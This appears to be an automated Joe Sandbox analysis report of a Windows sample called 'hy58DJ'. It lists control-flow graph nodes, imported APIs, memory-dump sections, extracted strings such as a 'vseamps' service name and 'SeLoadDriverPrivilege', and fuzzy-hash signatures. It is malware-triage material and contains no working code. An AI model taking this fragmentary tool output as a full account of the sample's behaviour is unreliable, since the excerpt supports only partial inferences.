                                      control_flow_graph 196 7ffe1a4511b0-7ffe1a451207 197 7ffe1a45124b-7ffe1a45124e 196->197 198 7ffe1a451209-7ffe1a451222 call 7ffe1a461490 196->198 199 7ffe1a451254-7ffe1a451280 197->199 200 7ffe1a4514b8-7ffe1a4514bf 197->200 206 7ffe1a451224-7ffe1a451227 198->206 207 7ffe1a45123e 198->207 203 7ffe1a451282-7ffe1a45128f 199->203 204 7ffe1a4512f6-7ffe1a451335 call 7ffe1a451b90 call 7ffe1a460a50 199->204 205 7ffe1a4514c3-7ffe1a4514ea call 7ffe1a451b70 200->205 209 7ffe1a451295-7ffe1a45129c 203->209 210 7ffe1a4514f1-7ffe1a4514f6 call 7ffe1a451a40 203->210 232 7ffe1a451340-7ffe1a4513cb 204->232 212 7ffe1a451241-7ffe1a451246 206->212 213 7ffe1a451229-7ffe1a45123c call 7ffe1a461490 206->213 207->212 216 7ffe1a45129e-7ffe1a4512a5 209->216 217 7ffe1a4512c7-7ffe1a4512cf call 7ffe1a451b90 209->217 224 7ffe1a4514f7-7ffe1a4514ff call 7ffe1a451110 210->224 212->197 213->206 213->207 223 7ffe1a4512ab-7ffe1a4512b3 call 7ffe1a451b90 216->223 216->224 230 7ffe1a4512d2-7ffe1a4512f1 call 7ffe1a460e10 217->230 236 7ffe1a4514eb-7ffe1a4514f0 call 7ffe1a4579cc 223->236 237 7ffe1a4512b9-7ffe1a4512c5 223->237 230->204 232->232 235 7ffe1a4513d1-7ffe1a4513da 232->235 240 7ffe1a4513e0-7ffe1a451402 235->240 236->210 237->230 242 7ffe1a451404-7ffe1a45140e 240->242 243 7ffe1a451411-7ffe1a45142c 240->243 242->243 243->240 244 7ffe1a45142e-7ffe1a451436 243->244 245 7ffe1a451498-7ffe1a4514a6 244->245 246 7ffe1a451438-7ffe1a45143b 244->246 248 7ffe1a4514b6 245->248 249 7ffe1a4514a8-7ffe1a4514b5 call 7ffe1a451bcc 245->249 247 7ffe1a451440-7ffe1a451449 246->247 250 7ffe1a451455-7ffe1a451465 247->250 251 7ffe1a45144b-7ffe1a451453 247->251 248->205 249->248 253 7ffe1a451470-7ffe1a451496 250->253 254 7ffe1a451467-7ffe1a45146e 250->254 251->250 253->245 253->247 254->253
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 73155330-0
                                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction ID: 1085ad887b89c5e2227a5f256f3f81a9e86ccb4142842dea9a684c7e384984b4
                                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction Fuzzy Hash: A3815F72B19F8245E611AB369440179A694FF56FD4F148376EF5D537A2DF3CE0A18300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3526400053-0
                                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                      • API String ID: 3408796845-4213300970
                                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                      • String ID: ampStopSingletone: logging ended
                                      • API String ID: 2048888615-3533855269
                                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                      • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                      • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                      • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ErrorLastManagerOpen$FileModuleName
                                      • String ID: /remove$/service$vseamps
                                      • API String ID: 67513587-3839141145
                                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressProc$Load$Library
                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                      • API String ID: 3981747205-232180764
                                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                      • String ID:
                                      • API String ID: 4284112124-0
                                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                      • String ID: vseamps
                                      • API String ID: 3693165506-3944098904
                                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileModuleName
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 514040917-4022980321
                                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 2057259594-0
                                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                      • String ID:
                                      • API String ID: 3103264659-0
                                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction ID: f4c8e9e66868b3be00f07d449a232f924ee51fba6d81a67e51517ae38fe6edfc
                                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction Fuzzy Hash: 27312A72B09E8196EB609F61E8403B96371FB84B54F4440BADB5E47BA4EF38D658C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 1269745586-0
                                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction ID: 9b97428b303c869e5234537e8c306069692027ae4e0eefbf5c3aaacc802b93cc
                                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction Fuzzy Hash: 98315232B18F8196DB60DB26E8402BE73A0FB84BA4F5005B6EA9D43B65EF3CD555C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                      • String ID:
                                      • API String ID: 1445889803-0
                                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContext
                                      • String ID:
                                      • API String ID: 2202868296-0
                                      • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                      • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                      • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                      • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                      • Instruction ID: a3eb045688c791ba5a8616989583bbb465f28d37fd0766ede3ac23a890184159
                                      • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                      • Instruction Fuzzy Hash: 6DB10773604B898AE715CF2AC4463687BB0F784F68F15C9A6DA6D837A4CB39D461C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
